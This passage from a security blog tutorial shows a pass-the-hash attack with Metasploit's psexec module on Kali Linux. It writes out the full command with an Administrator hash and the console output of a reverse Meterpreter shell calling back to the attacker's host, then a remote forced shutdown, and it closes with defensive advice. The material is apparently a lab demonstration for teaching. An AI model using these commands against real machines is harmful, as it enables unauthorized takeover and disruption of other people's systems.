So, what about If the Computer A is an attacker and has a network sniffer? It collects the Computer B hash! Now attacker on Computer A can try to decode the hash, but not only that. He can use Metasploit, taking advantage of the module pass the hash, and own the B machine.
He uses the Administrator hash to connect to ADMIN$ of B and execute some code like reverse shell. The SMB_relay exploit, present in Metasploit, has everything you need to test this Windows vulnerability: it creates a fake sharing folder, captures the hash, pushes a payload and establishes a connection. Of course the pass the hash function can be also used with hashes previously collected:

root@kali:~# msfcli exploit/windows/smb/psexec RHOST=192.168.34.135 SMBuser=Administrator
SMBPass=E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C E

RHOST => 192.168.34.135
SMBuser => Administrator
SMBPass => E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C
[*] Started reverse handler on 192.168.34.140:4444
[*] Connecting to the server...
[*] Authenticating to 192.168.34.135:445|WORKGROUP as user 'Administrator'...
[*] Uploading payload...
[*] Created \QxsHwGjv.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.34.135[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.34.135[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (OihQHhAa - "MZqTViuX")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \QxsHwGjv.exe...
[*] Sending stage (752128 bytes) to 192.168.34.135
[*] Meterpreter session 1 opened (192.168.34.140:4444 -> 192.168.34.135:1534) at 2013-08-01 10:10:44 -0400

meterpreter > sysinfo
Computer        : HP-SRV01
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32

meterpreter > shell
Process 3816 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>shutdown -s -t 00 -c "ByeBye!"
shutdown -s -t 00 -c "ByeBye!"

Are you still secure to connect to a network shared folder? So, if you have to secure a network, remember the users: force a strong domain policy, patch the systems, use SSL wherever you can, set different passwords for different services and, above all, educate the people.

]]>
https://www.gosecure.it/blog/art/425/sec/the-password-attacks-on-kali-linux-part-2/feed/ 0